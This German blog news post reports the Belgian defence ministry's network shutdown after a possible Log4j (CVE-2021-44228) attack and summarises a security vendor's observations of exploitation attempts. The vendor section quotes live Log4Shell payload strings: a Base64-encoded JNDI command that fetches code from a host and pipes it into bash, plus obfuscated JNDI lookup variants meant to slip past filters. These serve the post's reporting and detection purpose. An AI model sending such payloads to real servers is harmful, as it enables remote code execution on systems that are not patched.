Log4j-Infos, belgisches Verteidigungsministerium betroffen?

Publiziert am 20. Dezember 2021 von Günter Born

Sicherheit (Pexels, allgemeine Nutzung)[English]Die Schwachstelle CVE-2021-44228 in der JAVA-Bibliothek log4j zieht weitere Kreise. Das belgische Verteidigungsministerium hat seine Netzwerke nach einem schweren Cyberangriff wohl abgeschaltet und dies in der Nacht von Sonntag auf Montag eingestanden. Berichte kolportieren, dass es mit der log4j-Schwachstelle CVE-2021-44228 zu tun habe. Derweil läuft das Patchen der verwundbaren Bibliothek in den betroffenen Produkten nur zäh an. Administratoren haben oft das Problem, herauszufinden, ob und welche Software betroffen ist.

Ich hatte ja im Blog-Beitrag 0-day CVE-2021-44228 in Java log4j-Bibliothek tangiert zahlreiche Anbieter über die Schwachstelle, die zahlreiche Systeme betrifft, berichtet. Und es war bekannt, dass das Bundesfinanzhof zu den Opfern gehört, die ihre Webseite offline nehmen mussten (siehe Log4j-News: New Schwachstelle, Bundesfinanzhof-Webseite down, viele Firmen ungepatcht).

Anzeige

Belgisches Verteidigungsministerium schaltet Netzwerk ab

Ich bin über nachfolgenden Tweet von Catalin Cimpanu auf den Sachverhalt aufmerksam geworden. Das belgisches Verteidigungsministerium hat Teile seines IT-Netzwerks offline geschaltet, weil ein Cyber-Angriff stattgefunden hat. Davon sind auch die E-Mail-Server betroffen.

Belgisches Verteidigungsministerium nimmt IT offline

Dieser flämischsprachige Artikel enthält einige Hinweise. Seit vergangenem Donnerstag kämpft das Verteidigungsministerium Belgiens mit den Folgen eines schweren Cyberangriffs. Ein Teil des Computernetzes kann nach Angaben des Sprechers vorerst nicht genutzt werden. Sprecher Olivier Séverin sagte dazu:

Das Verteidigungsministerium hat am Donnerstag einen Angriff auf sein Computernetzwerk mit Internetzugang entdeckt. Schnell wurden Quarantänemaßnahmen ergriffen, um die betroffenen Teile zu isolieren. Vorrangig geht es darum, das Verteidigungsnetz einsatzbereit zu halten.

Während des gesamten Wochenendes waren unsere Teams im Einsatz, um das Problem unter Kontrolle zu bringen, unseren Betrieb fortzusetzen und unsere Partner zu alarmieren. Die Priorität liegt darin, das Netz betriebsbereit zu halten. Wir werden die Situation weiter beobachten

Als Folge der Quarantänemaßnahmen ist das Mailsystem zum Beispiel seit außer Betrieb. Der Cyberangriff erfolgte, laut dem verlinkten Artikel, nachdem erst letzte Woche eine Sicherheitslücke (log4j) in der Software entdeckt worden war. Es ist nicht klar, wer hinter dem Computerangriff auf den Verteidigungsbereich steckt. Das Verteidigungsministerium verweigert aktuell aber jede Auskunft, ob der Angriff über die log4j-Schwachstelle mittels einer Log4Shell stattgefunden hat.

Vectra AI-Analyse zu log4j

Der Sicherheitsanbieter Vectra hat aktiv die Versuche von Angreifern beobachtet, diese Schwachstelle in freier Wildbahn auszunutzen. Die nachstehende Grafik aus Vectra Recall zeigt eine Flut von HTTP-Anfragen, die Nutzdaten für den Exploit enthalten.


Quelle: Vectra Recall

Die meisten dieser ursprünglichen Versuche kamen aus dem Tor-Netzwerk und versuchten, Hosts dazu zu bringen, die Domain *bingsearchlib[.]com zu kontaktieren. Obwohl es einige Spekulationen darüber gibt, was diese Domain beinhaltet, wurden von Vectra keine Nutzdaten von dieser Domain abgerufen. Private Analysen deuten darauf hin, dass die Nutzlast mit dem Coin Mining zusammenhängt.

Vectra hat die verschiedenen Domains beobachtet, die als URL in den Log4shell-Strings verwendet werden (entweder in den User Agent, die URI oder andere Klartextfelder der HTTP-Anfrage gepackt). Die Verwendung des ursprünglich identifizierten Exploits hat sich weiterentwickelt, wobei potenzielle Angreifer den ausführbaren Teil des Exploits beispielsweise in eine Base64-Zeichenfolge am Ende der JNDI-URL kodieren:

${jndi:ldap://1.2.3.4:12344/Basic/Command/Base64/KGN1cmwgLXMgMS4yLjMuNDo1ODc0LzEuMi4zLjQ6NDQzfHx3Z2V0IC1xIC1PLSAxLjIuMy40OjU4NzQvMS4yLjMuNDo0NDMpfGJhc2g=

Vectra hat IPs mit dieser Kodierung mehrfach in seinen Metadaten beobachtet.

Anzeige

Eine weitere Entwicklung, die Vectra in freier Wildbahn beobachtet hat, ist eine zweite Ebene der Verschleierung, die von Bedrohungsakteuren eingesetzt wird. Dabei handelt es sich um eine weitere Funktion der JNDI-Engine, die es ermöglicht, gesendete Zeichenketten in ihr ursprüngliches Format zu entschlüsseln und dann die Verbindung zum LDAP-/Verzeichnisdienst herzustellen. Diese wurden wie folgt beobachtet:

${jndi:${lower:l}${lower:d}a${lower:p}://world80
${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//
${jndi:dns://

Während Vectra diese Entwicklung bereits vor zehn Tagen feststellte, ist die Nutzung seitdem tatsächlich zurückgegangen. Doch warum ist das so?

Leider treiben die Verteidiger die Entwicklung von Exploits voran

Während die Verteidiger versuchen, sich gegen neue Exploits zu schützen, versuchen die Angreifer, sich weiterzuentwickeln. Der Rückgang der zweiten Stufe kann speziell mit einem (inzwischen gelöschten) Repository auf GitHub in Verbindung gebracht werden.

Ähnliche Artikel:
0-day CVE-2021-44228 in Java log4j-Bibliothek tangiert zahlreiche Anbieter
Gegenmittel für 0-day CVE-2021-44228 in Java log4j-Bibliothek
log4j-Schwachstelle CVE-2021-44228: Minecraft dringend patchen
VMware-Produkte durch log4j-Schwachstelle CVE-2021-44228 bedroht
log4j FAQ und Repository
Log4j-News: New Schwachstelle, Bundesfinanzhof-Webseite down, viele Firmen ungepatcht

Cookies blockieren entzieht uns die Finanzierung: Cookie-Einstellungen
Dieser Beitrag wurde unter Sicherheit abgelegt und mit verschlagwortet. Setze ein Lesezeichen auf den Permalink.

2 Antworten zu Log4j-Infos, belgisches Verteidigungsministerium betroffen?

  1. Thor sagt:
    20. Dezember 2021 um 16:41 Uhr

    Wo genau sind da denn nun die (Cyber-)Angriffe?
    Ich sehe da nur ganz normale user requests aus dem Internet. Zudem funktioniert Log4j wie spezifiziert. Siehe auch h**p://heise.de/-6294476.

    Sieht eher danach aus, dass das Internet wieder ein Stück sicherer wird.

    Antworten
    • ich sagt:
      21. Dezember 2021 um 08:51 Uhr

      Nein, das Gegenteil ist der Fall. Es wird in Zukunft noch viel mehr Angriffe auf kritische Infrastrukturen geben. Log4j ist nur ein Fall, wo die Sicherheitslücke bekannt ist. Im Hacker-Untergrund schwirren aber viel mehr Exploits und Sicherheitslücken umher, von denen bisher noch keiner weiß. Meistens schließen die Software-Entwickler ihre ausnutzbaren Lücken (Fehler) auch nur dann, wenn es schon zu spät ist. Und genau das ist das Problem, aufgrund des zunehmenden Konkurrenzkampfes der Software-Hersteller wird vieles ohne Audit und umfangreicher Prüfung veröffentlicht, hauptsache man gerät nicht ins Hintertreffen.

      Solange auch unter den "Hackern" ein Konkurrenzkampf herrscht, wer die meisten ausnutzbaren Sicherheitslücken findet und wer die meisten Unternehmen hackt, solange wird es auch solche Angriffe geben. Es ist ja auch viel einfacher Software zu analysieren und Reverse Engineeren , als unhackbare Software zu schreiben.

      Antworten

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

Hinweis: Bitte beachtet die Regeln zum Kommentieren im Blog (Erstkommentare und Verlinktes landet in der Moderation, gebe ich alle paar Stunden frei, SEO-Posts/SPAM lösche ich rigoros). Kommentare abseits des Themas bitte unter Diskussion.